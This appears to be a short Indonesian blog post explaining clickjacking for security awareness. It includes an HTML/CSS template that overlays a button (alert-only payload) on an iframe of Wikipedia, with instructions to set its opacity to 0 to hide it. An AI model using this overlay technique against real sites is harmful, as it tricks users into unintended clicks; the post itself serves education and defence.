Clickjacking Script Example

Clickjacking adalah teknik mengelabui pengunjung website menggunakan iframe website aslinya dengan menempelkan kode HTML atau Javascript pada iframe tersebut. Selengkapnya tentang clickjacking https://owasp.org/www-community/attacks/Clickjacking

Contoh script berikut tidak ditujukan untuk disalahgunakan, melainkan untuk lebih aware terhadap keamanan sebuah website.

Berikut contoh script clickjacking.

<style>

iframe {

height: 100%;

width: 100%;

border: 0;

}

.frame-container {

position: relative;

}

.iframe-button {

display: none;

position: absolute;

top: 80px;

left: 300px;

height: 10%;

width: 20%;

opacity: 2;

}

.frame-container:hover .iframe-button {

display: initial;

}

</style>

<div class="frame-container">

<button class="iframe-button" onclick="alert('clickjaciking');">

Click me

</button>

<iframe src="https://id.wikipedia.org"></iframe>

</div>

Untuk menyembunyikan tombol button "click me", silahkan hidden button tersebut dengan merubah nilai "opacity" pada class iframe-button dari 2 menjadi 0

Lokasi:

Berbagi :